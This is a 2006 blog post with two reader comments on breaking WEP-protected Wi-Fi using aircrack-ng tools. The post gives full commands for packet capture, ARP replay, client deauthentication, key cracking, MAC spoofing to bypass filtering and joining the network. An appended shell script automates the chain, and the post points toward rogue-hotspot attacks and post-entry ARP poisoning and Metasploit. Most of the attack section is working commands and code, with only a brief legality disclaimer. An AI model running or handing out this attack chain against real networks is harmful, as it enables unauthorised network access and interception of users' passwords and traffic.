Wireless insecurity.
Blogged on 30th August 2006 at 16:47:30 in Security
I'm sure most people who read this will know that WEP is crap. I had a few minutes spare today and used them to finally put my Linksys WUSB54G adapter, bought months ago for wireless pentesting, to use.

After downloading the patched rt2570 drivers I had packet injection working. It took me 14 minutes from start to finish to find a wireless network using WEP and connect to it. The captured data could then be decrypted with the cracked WEP key and loaded into Wireshark. Cleartext passwords everywhere!

The next task is to research attacking wireless clients directly. Looking at airodump-ng output, there are many machines probing for hotspots such as iZone. All I need to do is turn my laptop into a hotspot that answers those probes and trick the clients into connecting. Projects already exist for this, such as hotspotter.

Disclaimer: Breaking in to computers and networks is illegal. Don't do it unless you've been authorised to do so (i.e. you're conducting a pentest for a client).

The process to crack an access point from start to finish, in about 14 minutes, is as follows:

  • Put the adapter into monitor mode with airmon-ng:

    # airmon-ng start rausb0

  • Run airodump-ng to find networks:

    # airodump-ng rausb0

  • Kill airodump-ng and restart it with channel hopping turned off and a capture file, to focus on the network of interest (channel 6 here):

    # airodump-ng -w out --channel 6 rausb0

  • Look for clients associated with the target BSSID in the airodump-ng output; the ARP replay below needs one.

  • Use the ARP replay attack to make the AP generate data packets (and therefore new IVs) quickly. aireplay-ng picks out encrypted ARP requests by their fixed size, so no key is needed to replay them, and the AP re-broadcasts each replayed request under a fresh IV:

    # aireplay-ng -3 -b <bssid of ap> -h <mac of client> rausb0

  • If the ARP replay attack doesn't see any ARP requests but there are clients on the network, use aireplay-ng's deauthentication attack to force a client to disconnect. Most operating systems will then reconnect and send out an ARP request, which aireplay-ng captures and replays.

  • Wait until the captured data count is high enough for aircrack-ng to recover the key (20,000+ in most cases; longer keys need more). aircrack-ng can be started while airodump-ng is still capturing and will retry as more IVs arrive.

  • Crack the key with:

    # aircrack-ng out-01.cap

  • If MAC filtering is turned on, set the wireless adapter's MAC to that of one of the clients (use aireplay-ng's deauthentication to knock the real client off first):

    # ifconfig rausb0 down

    # macchanger -m <fake MAC> rausb0

    # ifconfig rausb0 up

  • Associate with the network (give the key as hex, i.e. the digits aircrack-ng prints with the colons removed):

    # iwconfig rausb0 mode managed key <key>

    # iwconfig rausb0 ap <bssid of ap>

    # iwconfig rausb0 essid <ssid> [optional]

  • Configure an IP address manually or with DHCP:

    # dhclient rausb0

  • Try to ping the default gateway to confirm IP connectivity, then start the real pentesting (ARP poisoning/spoofing to sniff on switched networks, nmap, and get Metasploit running).
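The steps above wired into one script, as an added example that is not part of the original post. It assumes the aircrack-ng tool names used above (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng) plus macchanger, an rt2570-style interface called rausb0, and that airodump-ng writes its text dump as out-01.csv (newer releases) or out-01.txt (older ones). The BSSID, client MAC and channel are placeholders to be replaced with what airodump-ng shows; the sample dump inside the script is constructed for self-checking, not a real capture.

```shell
#!/bin/sh
# Added example (not from the original post): WEP attack chain in one script.
# Assumptions: aircrack-ng tool names as in the post, macchanger installed,
# interface rausb0. MACs and channel below are placeholders.
set -eu

IFACE="${IFACE:-rausb0}"
CHANNEL="${CHANNEL:-6}"
BSSID="${BSSID:-00:11:22:33:44:55}"     # placeholder: target AP
CLIENT="${CLIENT:-66:77:88:99:aa:bb}"   # placeholder: a client seen by airodump-ng
PREFIX="${PREFIX:-out}"                 # airodump-ng -w prefix
MIN_DATA="${MIN_DATA:-20000}"           # data frames before trying aircrack-ng

# Accept only a colon-separated MAC such as 00:11:22:33:44:55.
valid_mac() {
    printf '%s\n' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# Print the data-frame count airodump-ng has logged for one AP (0 if unknown).
# Header names differ between releases ("# data" in the old .txt dump,
# "# IV" in the later .csv), so the column is located by name, not position.
# Usage: ap_data_count <dump file> <bssid>
ap_data_count() {
    [ -r "$1" ] || { echo 0; return; }
    awk -F',' -v bssid="$2" '
        function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
        tolower(trim($1)) == "bssid" && col == 0 {
            for (i = 1; i <= NF; i++) {
                h = tolower(trim($i))
                if (h == "# data" || h == "# iv") col = i
            }
            next
        }
        col > 0 && tolower(trim($1)) == tolower(bssid) {
            print trim($col) + 0; found = 1; exit
        }
        END { if (!found) print 0 }
    ' "$1"
}

# Whichever text dump this airodump-ng release wrote.
dump_file() {
    if [ -r "$PREFIX-01.csv" ]; then echo "$PREFIX-01.csv"; else echo "$PREFIX-01.txt"; fi
}

# Constructed sample in the newer CSV layout, used to self-check ap_data_count.
write_sample_dump() {
    cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2006-08-30 16:20:01, 2006-08-30 16:31:12,  6,  54, WEP , WEP, OPN, -41,     1812,    23456,   0.  0.  0.  0,   7, default, 
aa:bb:cc:dd:ee:01, 2006-08-30 16:20:03, 2006-08-30 16:31:10, 11,  54, WPA , TKIP, PSK, -70,      931,       12,   0.  0.  0.  0,   5, other, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:aa:bb, 2006-08-30 16:21:00, 2006-08-30 16:31:11, -55,     4120, 00:11:22:33:44:55, default
EOF
}

# Poll the dump until enough data frames are in, then run aircrack-ng.
wait_and_crack() {
    while :; do
        n=$(ap_data_count "$(dump_file)" "$BSSID")
        echo "$n data frames captured for $BSSID (need $MIN_DATA)"
        if [ "$n" -ge "$MIN_DATA" ]; then break; fi
        sleep 30
    done
    aircrack-ng -b "$BSSID" "$PREFIX-01.cap"   # read the key from its output
}

# Borrow a client's MAC if the AP filters by MAC; then leave monitor mode and join.
spoof_mac() { ifconfig "$IFACE" down; macchanger -m "$1" "$IFACE"; ifconfig "$IFACE" up; }
join_network() {
    iwconfig "$IFACE" mode managed key "$1"   # $1: hex key without colons
    iwconfig "$IFACE" ap "$BSSID"
    dhclient "$IFACE"
}

main() {
    valid_mac "$BSSID" || { echo "bad BSSID: $BSSID" >&2; exit 1; }
    valid_mac "$CLIENT" || { echo "bad client MAC: $CLIENT" >&2; exit 1; }
    airmon-ng start "$IFACE"
    airodump-ng -w "$PREFIX" --channel "$CHANNEL" "$IFACE" >/dev/null 2>&1 &
    dump_pid=$!
    aireplay-ng -3 -b "$BSSID" -h "$CLIENT" "$IFACE" >/dev/null 2>&1 &
    replay_pid=$!
    sleep 60
    # Still (almost) nothing replayed: deauth the client so it re-associates and ARPs.
    if [ "$(ap_data_count "$(dump_file)" "$BSSID")" -lt 1000 ]; then   # 1000: arbitrary
        aireplay-ng -0 5 -a "$BSSID" -c "$CLIENT" "$IFACE"
    fi
    wait_and_crack
    kill "$dump_pid" "$replay_pid"
}

# The live attack only runs when asked for explicitly: ./wep-crack.sh run
if [ "${1:-}" = "run" ]; then main; fi
```

The two injection steps run in the background so the script can watch the data count in the dump file rather than eyeballing the airodump-ng screen; spoof_mac and join_network are left for the operator to call once aircrack-ng has printed the key, since the post's last steps depend on reading it off.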


Comments

Comment by Temporo on 7th September 2006 at 13:09:05
I wanna have a go at doing this when I have a *nix and a wireless card/adapter.

T.
 
Comment by Tim on 1st December 2006 at 18:40:08
Looking for a bit of info on the ARP replay: if I am faking the association with the AP, how the hell does aireplay-ng find a packet sent from my faked client to replay? Surely this ARP request should be encrypted, so how the hell does my wireless card with a faked client generate this request to begin with?

Really bugging me: is it a specialised chopchop attack in aireplay -3 that somehow generates the correct IV from a weak IV sent by the AP? From time to time I have to wait a while before this ARP packet is generated with a faked client.